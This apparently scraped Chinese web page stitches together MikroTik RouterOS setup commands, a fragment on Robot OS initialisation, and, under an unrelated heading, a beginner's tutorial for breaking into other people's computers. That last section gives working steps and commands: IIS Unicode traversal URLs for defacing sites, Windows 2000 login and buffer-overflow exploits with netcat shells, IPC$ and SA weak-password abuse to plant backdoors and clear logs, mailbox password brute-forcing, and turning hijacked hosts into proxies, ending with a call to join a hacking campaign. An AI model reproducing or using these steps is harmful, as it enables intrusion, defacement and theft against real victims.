rostelnet命令

Ⅰ ros 2.9.27 的破解命令是什么

设置好要安装的router，按A，再按 I，接着按N，再按Y，稍等安装2.927中，，，提示按回车重新启动机器，启动后提示按Y，然后进入登入界面（我的是破解版所以到登入界面），输人默让帐号admin，密码为空，进人后输入y回车，再Q回车，接着我查看网卡：命令看下面操作：interface--print,硬件正常的情况下，设置网卡名称网络：set 0 name = lan 意思是设置0的网卡为局域网用的网卡 ，set 1 name = wan ,意思是设置1的网卡为外网电信网卡用的标示，接着看操作：按/返回主操作面，setup安装，按A---再回车设置你要设置的局域网IP：192.168.1.1/24 （看清楚是局域网lan）回车，设置网关 0.0.0.0回车，接着退出按X，按2次，接下来ping 192.168.1.1 能通设置证明 成功，然后用IE打开http://192.168.1.1 进网站下载左上角的winbox 进人以下的设置：

routet os 设置好lanIP 后 用http://IP 下载winbox 进入以下操作：

给你的网卡改名字，这个是个好习惯！

interfaces -----> ether2-->lan ether1-->wan

接着给另一个网卡添加IP 也就是电信或者是网通给你的IP地址（外网IP）

ip--->address----> + 如果你有路由表的话，可以用FTP上传到路由上

如下表：

Address Network Broadcast interface

IP： 外网IP/29 外网IP 外网IP wan

192.168.1.0/23 192.168.0.0 192.168.1.255 lan

现在就要做nat共享上网了。

在ip--->firewall-->nat

增加一条规则 src.address 这里写自己整个网段！

网段为192.168.1.0-192.168.1.255就写这样192.168.1.0/23

action 里选 masquerade 这样就可以了，这样网吧就可以上网了

3步：限速脚本的编写！ 防火墙脚本（包括防SYN的）

4、绑定ARP

用超级管理员账号登录，IP-----ARP，这样可以看到 一行行的 IP和MAC地址，"
这些就是内网有网络活动的计算机。选中一个，双击，点右下角的TOOLS----，选COPY----点OK，依次

进行，全部绑定后，来到WINBOX的INTERFACE选项，双击内网网卡，在ARP选项里，选择“replay-only”

至此，通过ROS绑定IP完毕，这样下面客户机只要一改IP，那么它就无法和网关进行通讯了，当然也无法

使主机吊线了。

5、怎么样把ROS的各种设定导出(共享?) 使用export命令导出，使用import命令导入。
如：导出全部配置命令为：/export file=xxxw
导入配置命令：/import file=xxx
导出防火墙配置的命令：/ip firewall export file=xxx
备份设置：files-->backup 再用ftp client download备份文件
恢复设置：ftp client upload 备份文件；files --> restore2G

6、备份和恢复设置
用WINBOX登陆，注意用ADMIN帐号，在左边是不是有个FILES，点对话框上面的BACKUP，这样就把当前的

设置保存一个文件里面了，再用IE登陆你的路由，用ftp://网管帐号：密码@路由IP:端口，登陆到你的路

由后就会到你保存的文件了！用IE直接下载吧！

当你重新安装时，只要把内网弄通，用IE再登陆你的路由，把这个设置文件传上去，在WINBOX左边下面有

个TE开头的英文，这是终端模拟，点开后就像在路由上操作一样，用以下命令恢复你以前的设置：
system回车

backup回车

load name=你保存的设置文件名 回车

提示重启就一下子恢复到你以前设置了

是不是方便实用啊？

大家可能会说用WINBOX备份不爽，那我们也可以用终端备份呀！

在WINBOX左边下面有个telnet开头的英文，这是终端模拟，点开后就像在路由上操作一样，用以下命令备

份你以前的设置：

system回车

backup回车

save name=你保存的设置文件名 回车

建议文件名用日期表示可以很直观。这样就按你的文件名保存了。

用LOAD NAME命令就是恢复了。。。

如果设错了规则或者地址，造成win不能进入管理界面，可以这样复原：
使用 admin 登陆
system 回车
reset 选择 y
将删除所有改动，恢复新装的状态

这个是恢复到出厂设置，很适合刚开始设置ROUTEOS时用用！

15、备份ROUTEOS

可以用GHOST8。0备份，注意是要用全盘备份，DISK TO IMG才行

Ⅱ ROS软路由常用命令有哪些

作为不同网络之间互相连接的枢纽，路由器系统构成了基于TCP/IP 的国际互联网络Internet 的主体脉络，也可以说，路由器构成了Internet的骨架。这篇文章主要介绍了ROS软路由常用命令 小结,需要的朋友可以参考下

具体介绍

1 accept： 接受

add-dst-to-address-list - 把一个目标IP地址加入address-list

add-src-to-address-list - 把一个源IP地址加入address-list

2 drop - 丢弃

3 jump - 跳转，可以跳转到一个规则主题里面，如input forward，也可以跳转到某一条里面

4 log - 日志记录

5 passthrough - 忽略此条规则

6 reject - 丢弃这个包，并且发送一个ICMP回应消息

7 return - 把控制返回给jump的所在

8 tarpit - 捕获和扣留 进来的TCP连接 (用SYN/ACK回应进来的TCP SYN 包)router os命令：

看了很多router os 的资料都是关于如何安装的，却很少见到关于router os的命令资料(也许因为有winbox了)，虽然在router os 的手册中有说明，但是是英文版本的，很不好看懂。下面就我就写出一些常用的命令，希望对大家有所帮助：

1、开机登陆以后常用的一个 ? 是常用的帮助命令，可以列出可用的命令及简单的说明。

2、有些英文命令很长，可以简写如inte***ce ，你输入in后回车自动就会进入inte***ce了。或者你可以按下tab键来帮你完成长英文命令的输入。

3、有些命令的参数很多，你不知道的时候可以输入命令后加空格?，如print ?可以显示该命令的参数。

4、setup 该命令可是谁都要记得的，因为最初安装完router os 必须用它分配网卡的ip地址。

5、ip route add gate=211.12.*.14，220.163.*.12 该命令用于多线路接入时加入多个网关用的。

6、ip firewall add action=nat protocol=tcp dst-address=212.12.*.*/32：80 to-dst-address=192.168.0.198 该命令用于映射端口80到本地的192.168.0.198上。

7、print 该命令有点用于列出所有的项目。

8、inte***ce monitor-traffice 0，1，2 可以监视当前0，1，2网卡的活动情况。

9、ip firewall connection print 显示当前的所有的连接。

10、ip arp print 显示所有router os 知道的ip地址和mac地址的对应列表。

11、user active print 显示所有的router os 的活动用户。

12、system reboot 、system shutdown分别是重启和关机。

13、system reset 删除所有原来的配置，并重新启动router os. 14、system resource monitor 可以监视当前的cpu，和内存的使用情况。

15、log print 可以显示router os 的日志。

16、tool ping-speed 210.13.14.* 可以显示ping 的速度。

17、tool sniffer start，和tool sniffer stop 可以开启和停止嗅探器。

18、tool sniffer packet print 可列出嗅探的包。

19 、system backup name=2004107.bak 可以将系统的配置备份到文件2004107.bak，可以用file print看到。

还有什么enable，disable，remove，set 那些常用的就不说了。

相关阅读：路由器安全特性关键点

由于路由器是网络中比较关键的设备，针对网络存在的各种安全隐患，路由器必须具有如下的安全特性：

(1)可靠性与线路安全 可靠性要求是针对故障恢复和负载能力而提出来的。对于路由器来说，可靠性主要体现在接口故障和网络流量增大两种情况下，为此，备份是路由器不可或缺的手段之一。当主接口出现故障时，备份接口自动投入工作，保证网络的正常运行。当网络流量增大时，备份接口又可承当负载分担的任务。

(2)身份认证路由器中的身份认证主要包括访问路由器时的身份认证、对端路由器的身份认证和路由信息的身份认证。

(3)访问控制对于路由器的访问控制，需要进行口令的分级保护。有基于IP地址的访问控制和基于用户的访问控制。

(4)信息隐藏与对端通信时，不一定需要用真实身份进行通信。通过地址转换，可以做到隐藏网内地址，只以公共地址的方式访问外部网络。除了由内部网络首先发起的连接，网外用户不能通过地址转换直接访问网内资源。

(5)数据加密

为了避免因为数据窃听而造成的信息泄漏，有必要对所传输的信息进行加密，只有与之通信的对端才能对此密文进行解密。通过对路由器所发送的报文进行加密，即使在Internet上进行传输，也能保证数据的私有性、完整性以及报文内容的真实性。

(6)攻击探测和防范

路由器作为一个内部网络对外的接口设备，是攻击者进入内部网络的第一个目标。如果路由器不提供攻击检测和防范，则也是攻击者进入内部网络的一个桥梁。在路由器上提供攻击检测，可以防止一部分的攻击。

(7)安全管理

Ⅲ 机器人操作系统ROS--初始化测试(三)

在使用 ROS 之前，需要先初始化 rosdep。rosdep 使得你可以为你想要编译的源码，以及需要运行的 ROS 核心组件，简单地安装系统依赖。

环境设置：
然后再初始化环境变量:（每次启动一个新的终端时，ROS 环境变量都能自动地添加进你的 bash ）
一定要运行以下命令，才可启动：

如果安装了多个 ROS 发行版，则 ~/.bashrc 必须只 source 当前正在使用的那一版的 setup.bash。
如果你只想要修改当前 shell 的环境，则输入如下的命令来替换上面的命令：

注意: turtlesim 的运行依赖于 roscore 的运行，因此在测试 turtlesim 需要同时运行 roscore，也就是同时再打开一个终端运行。

出现一只随机的乌龟

Ⅳ ROS无法使用telnet操作，winbox下想添加脚本scripts的添加按钮灰色

由于网上很多朋友问我怎么入侵别人的机器，所以整理了一些我认为容易学的漏洞入侵方法，希望能给初学者一些帮助，下面讲的内容很简单，高手就不用浪费时间看了，：）

（1） UNICODE漏洞入侵
“Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。
第一步，运行RANGSCAN扫描器，会出现扫描窗口，在最上面有两个from的横框，这是让你填一段IP范围的。在第一个框里填入启始域（打个比方，比如你要扫192.168.0.1至192.168.0.255）那么你在第一个框里就填入192.168.0.1，在to 后面的框里填入192.168.0.255 意思就是扫192.168.0.0至192.168.0.255这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框，是要填入内容的如：
/scripts/..%c0%af../winnt/system32/cmd.exe
这句话的意思是扫描有 %c0%af 漏洞的机器，对象一般是英文的WIN2000机。
我们把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里，再按一下添加。再按“扫描”。就看到RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了，如果你选的IP范围好，呵，很快在扫描结果框里就会显示扫到的漏洞主机
如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe
意思是192.168.0.111主机有 %c0%af 漏洞，
目标有了，我们马上打开浏览器。在网址栏里输入：
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回车
意思是查看机器里C盘的根目录。一般情况下，我们都可以在浏览器里看到类似如：
Directory of c:\
2002-03-13 03:47p 289 default.asp
2002-02-11 03:47p 289 default.htm
2002-03-09 04:35p <DIR> Documents and Settings
2002-02-11 03:47p 289 index.asp
2002-02-11 03:47p 289 index.htm
2002-05-08 05:19a <DIR> Inetpub
2002-01-19 10:37p <DIR> MSSQL7
2002-03-09 04:22p <DIR> Program Files
2002-01-23 06:21p <DIR> WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,568 bytes free
------------------------------
的目录列表。也会碰到看不到文件的空目录。
好，我们成功看到了机器里的C盘了。
我们在浏览器里输入：
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回车
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ON
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=192.168.0.111
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=192.168.0.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
PATH_TRANSLATED=c:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa
-----------------
哈，我们看到了机器设置内容了，我们找找，主要看PATH_TRANSLATED=c:\inetpub\wwwroot
意思是他的主页存放在c:\inetpub\wwwroot的目录里，知道就好办了。
我们用命令：
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回车
我们就可以看到c:\inetpub\wwwroot目录里的文件了，一般都有default.asp, default.htm , index.htm, index.asp,等等。我们以目录里有index.asp做例子。
我们先要做的是把文件的只读属性解除掉，很多管理员都把文件设置只读。
我们用命令：
192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 回车
当看到下面的英文
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
恭喜你，你可以改他的网页了。
----------------------------------------
但如果你看到下面的英文就不成功，只好换其他机器了。
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access denied - C:\inetpub\wwwroot\index.asp
-----------------------------
继续。现在用ECHO改网页的内容。
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+网站有漏洞+> c:\inetpub\wwwroot\index.asp 回车
当看到
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
的提示，你已经改了他的网页了，呵呵，你想改成什么字也行。只要把命令中的中文换成你自己的中文就行了。

英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
中文WIN2000
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe
WIN NT4
/scripts/..%c1%9c../winnt/system32/cmd.exe
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe
通用代码：/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

（2） Windows2000输入法漏洞
先用端口扫描器扫描开放3389的机器，然后用终端客户端程序进行连接，用CTRL+SHIFT快速切换输入法，切换至全拼，这时在登录界面左下角将出现输入法状态条，在输入法状态条上按鼠标右键。选择“帮助” —— “输入法指南” —— “选项”。（如果发现“帮助”呈灰色，放弃，因为对方很可能发现并已经补上了这个漏洞。）按右键，选择“跳转到URL”，输入：c:\winnt\system32在该目录下找到“net.exe”，为“net.exe”创建一个快捷方式，右键点击该快捷方式，在“属性” —“目标”—c:\winnt\system32\net.exe 后面空一格，填入“user guest /active :yes”。 点击“确定”（目的是，利用“net.exe”激活被禁止使用的guest账户）运行该快捷方式。（此时你不会看到运行状态，但guest用户已被激活。）然后重复操作上面的，在 “属性” —— “目标”—— c:\winnt\system32\net.exe 后面空一格，填入localgroup administrators guest /add（这一步骤目的是，利用“net.exe”将guest变成系统管理员。）再次登录终端服务器，以“guest”身份进入，此时guest已是系统管理员，已具备一切可执行权及一切操作权限。现在，我们可以像操作本地主机一样，控制对方系统。
（3） idq溢出漏洞
要用到3个程序，一个Snake IIS IDQ 溢出程序GUI版本，一个扫描器，还有NC。
首先扫描一台有IDQ漏洞的机器，然后设置Snake IIS IDQ 溢出程序，在被攻击IP地址后面写上对方的IP.端口号一般不需要改动，软件的默认绑定CMD.EXE的端口是813.不改了.用默认的，左面选择操作系统类型，随便选一个，我们选IIS5 English Win2k Sp0吧，点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了，然后我们用NC来连接。
进入MS-DOS。进入“nc”的目录。然后：nc --v IP 813
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
c:\>

看来没成功. 别灰心，在来一次，换用IIS5 English Win2k Sp1试试。
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
哈哈，终于上来啦，你现在可是system权限，下面该怎么做就看你的啦。

（4）IDA溢出漏洞
所用程序：idahack
进入MS-DOS方式（假设idq.exe在c:\下）
c:\idahack.exe
运行参数：c:\idahack <host> <hostport> <hosttype> <shellport>
chinese win2k : 1
chinese win2ksp1: 2
chinese win2ksp2: 3
english win2k : 4
english win2ksp1: 5
english win2ksp2: 6
japanese win2k : 7
japanese win2ksp1: 8
japanese win2ksp2: 9
korea win2k : 10
korea win2ksp1: 11
korea win2ksp2: 12
chinese nt sp5 : 13
chinese nt sp6 : 14

c:\idahack 127.0.0.1 80 1 80
connecting...
sending...
Now you can telnet to 80 port
好 luck 
好，现在你可以telnet它的80端口了，我们用NC来连接。
C:\nc 127.0.0.1 80

Microsoft Windows 2000 [Version 5.00.2195]
（C）版权所有 1985-1998 Microsoft Corp
C:\WINNT\system32>
OK，现在我们现在上来了，也可IDQ一样是SYSTEN权限，尽情的玩吧。

（5）.printer漏洞
这个漏洞，我们用两个程序来入侵。iis5hack和nc。
C:\>iis5hack
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p

usage: D:\IIS5HACK.EXE <Host> <HostPort> <HostType> <ShellPort>
用法: D:\IIS5HACK <溢出的主机> <主机的端口> <主机的类型> <溢出的端口>
chinese edition: 0
chinese edition, sp1: 1
english edition: 2
english edition, sp1: 3
japanese edition: 4
japanese edition, sp1: 5
korea edition: 6
korea edition, sp1: 7
mexico edition: 8
mexico edition, sp1: 9

c:\>iis5hack 127.0.0.19 80 1 119
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
Listn: 80

connecting...
sending...
Now you can telnet to 3739 port
好 luck

溢出成功！
c:\>nc 127.0.0.19 119
http://www.sunx.org

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

OK，我们又成功取得system权限！玩吧。

（6）139端口入侵
我们先确定一台存在139端口漏洞的主机。用扫描工具扫描！比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机，我们要使用nbtstat -a IP这个命令得到用户的情况！现在我们要做的是与对方计算机进行共享资源的连接。
用到两个NET命令，下面就是这两个命令的使用方法
NET VIEW?
作 用：显示域列表、计算机列表或指定计算机的共享资源列表。?
命令格式：net view [\\computername | /domain[:domainname]]?
参数介绍：?
<1>键入不带参数的net view显示当前域的计算机列表。?
<2>\\computername 指定要查看其共享资源的计算机。?
<3>/domain[:domainname]指定要查看其可用计算机的域?

NET USE?
作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。?
命令格式：net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
参数介绍：?
键入不带参数的net use列出网络连接。?
devicename指定要连接到的资源名称或要断开的设备名称。?
\\computername\sharename服务器及共享资源的名称。?
password访问共享资源的密码。?
*提示键入密码。 /user指定进行连接的另外一个用户。?
domainname指定另一个域。?
username指定登录的用户名。?
/home将用户连接到其宿主目录?
/delete取消指定网络连接。?
/persistent控制永久网络连接的使用。?
C:\net use \\IP
C:\net view \\IP
我们已经看到对方共享了他的C，D，E三个盘
我们要做的是使用NBTSTAT命令载入NBT快取.
c:\>nbtstat –R 载入NBT快取
c:\>nbtstat –c 看有无载入NBT快取
现在我们已经得到的139端口漏洞的主机IP地址和用户名，现在就该是我们进入他计算的时候了，点击开始---查找--计算机，将刚才找到的主机名字输入到上面，选择查找，就可以找到这台电脑了！双击就可以进入，其使用的方法和网上领居的一样。

（7）IPC入侵
所有程序：流光
开始：在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。输入我们要破解的IP段，我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令，这样可以加快扫描的速度 ：）填入IP，选择扫描NT/98主机。在“辅助主机”那里的“IPC$主机”前面打勾,然后在菜单了选“探测”，，扫描出结果以后，“IPC$主机”，选中后按“CTRL+F9”就开始探测IPC用户列表。会出现“IPC自动探测”
的窗体，把那两个选项都选了，然后点“选项” 为了加快弱口令扫描速度，这里的两个选项我们可以全部取消记住。然后点“确定”出来后点“是”就开始探测了。一会儿，结果出来了。比如我们探测出了用户名为“admin”的管理员，密码为“admin”，现在我们用命令提示符，熟悉下命令吧，输入:
net use file://对方ip/ipc$ "密码" /user:"用户名" || 建立远程连接
icmd.exe file://对方ip/admin$ || admin$是对方的winnt目录
net time file://对方IP/ || 看看对方的本地时间
at file://对方ip/ 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序
telnet 对方ip 端口

我们也可以改网页：
net use \\ip\ipc$ "admin" /uesr:"admin" 回车。
出现“命令成功完成”。
然后输入“dir \\ip\c$\*.*”
看到C:下所有内容。现在我们来改主页。一般主页放在c:\inetpub\wwwroot里面
输入“dir \\ip\c$\inetpub\wwwroot\*.*”。就可以看到index.htm或index.asp或default.htm或 default.asp.这些就是主页了，假如你黑页在C:下，就输入" 主页文件 \\ip\c$\inetpub\wwwroot"覆盖原文件这样就行了，简单吧？

日志清除，断开连接 ：
我们 cl.exe ，clear.exe 上去，再执行，就可以清除日志，比如clear all ：清除所有的日志。然后在断开连接：net use file://ip/ipc$ /delete

（8）超管SA空密码漏洞
使用的工具:流光IV
启动流光，按Ctrl+R。出现扫描设置对话框，设置扫描IP段，并且选择扫描的类型为SQL。点击“确定”，进行扫描，假设我们取得主机：127.0.0.1，然后点击“工具” —— SQL远程命令（或者Ctrl+Q），填入主机IP（127.0.0.1）、用户（sa）、密码（空）点击“连接”，出现远程命令行的界面。
net user heiying heiying1 /add 填加一个heiying的帐号和密码heiying1
net localgroup administrators heiying /add 将我们创建的heiying帐号填加到管理组。
下面我们来做跳板：
打开cmd.exe,输入net use \\127.0.0.1\ipc$ "heiying1" /user:"heiying"命令
显示命令成功完成。
上传srv.exe：
srv.exe \\127.0.0.1\admin$\system32
上传ntlm.exe：
ntlm.exe \\127.0.0.1\admin$\system32
启动服务：
首先用net time \\127.0.0.1
看看对方主机的时间,(假如回显\\127.0.0.1 的本地时间是上午12.00)，然后我们用at \\2127.0.0.1 12.01 srv.exe命令来启动srv.exe。等一分钟后就可以telnet了。
一分钟后在本机命令提示符中输入：
telnet X.X.X.X 99
然后我们要启动NTLM.exe：
在telnet状态下直接输入ntlm回车。
显示：windows 2000 telnet mp,by assassin,all rights reserved.done!
然后从新启动对方主机的telnet服务：net stop telnet（先关闭telnet服务）再输入net start telnet（启动telnet服务）然后我们退出telnet，然后在命令行下输入telnet 127.0.0.1,依照提示,接着输入用户名：heiying,密码：heiying1，回车。这样,我们的跳板就做好了，简单吧？
（上面上传的srv和ntlm等东东还有一个简便方法，全都可以直接用流光工具菜单里的种植者上传，60秒后自动运行，不用敲命令！呵呵~~~~方便吧！）

（9）如何用流光破解信箱密码
这次的目标是21CN，运行流光IV，选择POP3主机----右键----编辑----添加，填上：pop.21cn.com，其他的就用默认吧！不用更改，确定就行了。到下一步，还是右键-----从列表中添加------选择一个字典，没有的到网上下载一个字典，或者到黑白网络去下载，我们用简单模式探测！这样速度比较快，然后就等着成果吧，上次我以下就破了5个邮箱出来。

（10）frontpage进行攻击
打开您自己的Frontpage，文件菜单下选择“打开站点”，然后在文件夹框里写入http://127.0.0.1（http://不要漏掉）。按下“打开”按钮，一会后，出现了文件夹，成功了，现在就可以操作网页文件了。如果跳出错误信息，表示有密码，我们用以下http://127.0.0.1/_vti_pvt/service.pwd,这是默认的密码文件，下载下来，找个解密器破密码吧！破出来后就还可以改网页。这个只能改该网页，没什么玩的。

（11）用肉鸡做SOCK5代理跳板
需要软件：srv.exe，ntlm.exe，snakeSksockserver.exe，SocksCap.exe。
首先我们在命令提示符下建立IPC$管道：
net use \\127.0.0.1\ipc$ "密码" /user:帐号
通道建立好后，我们把srv.exe sss.exe ntlm.exe全部上传。
c:\ srv.exe \\10.10.10.10\admin$
1 files copied!
c:\ ntlm.exe \\10.10.10.10\admin$
1 files copied!
c:\ sss.exe \\10.10.10.10\admin$
1 files copied!
复制完毕后，
看肉鸡上现在的时间：
c:\net time \\127.0.0.1
显示当前时间是 2002/4/13 晚上 09：00
我们来启动srv.exe
c:\at \\127.0.0.1 09:01 srv.exe
等到09：01后。我们来连接肉鸡：
c:\telnet 127.0.0.1 99
连上后显示：
c:\winnt\system32>
接着我们启动NTLM.exe
c:\winnt\system32>ntlm
显示：
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
首先我们终止srv.exe的telnet服务：
C:\WINNT\system32>net stop telnet
继续：
C:\WINNT\system32>net start telnet
再启动TELNET。
OK，我们来登陆
c:>telnet 127.0.0.1
*==========================================================
Microsoft Telnet
*==========================================================
c:>
好了，一切顺利，我们现在正式开始做代理：
c:>sss.exe -install <---------开始安装
显示：
c:>sksockserver installed!
来看看配置：
c:>sss -config show
显示：
SkServer Port = 1813 <----开放服务的端口 ,我们记着这个1813端口哦
SkServer StartType: 3 - Manual <---服务启动方式
SkServer Enable Client Set Num:0 <---客户端的项目个数
SkServer Pass SkServer Number:0 <---经过SkServer的项目个数

来启动服务：
c:>net start skserver
提示你正在启动，并且完成。
来检查一下是不是启动了：
c:>net start <-----------看看启动的服务列表
These Windows 2000 services are started:

Print Spooler
Server
Snake SockProxy Service <---------------就是它，呵呵!
System Event Notification
TCP/IP NetBIOS Helper Service
Telephony
Telnet
The command completed successfully.

c:>_
好了，到这里我们已经做好了一个socks5代理了，我们自己的哦.OK，下面我们用sockscap来使用我们做代理。
安装好SocksCap后，我们在桌面上打开SocksCap V2，点开File选项选Settings...弹出卡片，在 SOCKS Server里面我们填肉鸡的IP：127.0.0.1，PortT填默认的1813端口，下面的我们选socks version 5，呵呵，和 Attempt local then remot,这是域名解析的顺序，先本地，然后才远程。设置完了点“确定”我们就可以使用了，添加应用程序到sockscap里面，点开那个"new"按钮，会弹出一个卡片，
Profile name ：程序名，随便写。
Command Line: 命令行，点后面的Browse...找到你的程序路径
Working:填好上面那个，这个就自动加上.
这样我们就把程序加到SocksCap里面了。
现在们可以双击里面的程序来使用，也可以选住程序在点"Run"来运行。

好了，终于写完了，上面的内容都很简单，很适合初学者，还望高手们不好见笑，刚好听说这次5.1有很多联盟有所行动，希望上面的内容能教会一部分人，少走弯路，让更多的人参与这次行动。UNIX和LINUX由于自己的功力也还不够，还差很远，所以还不敢写。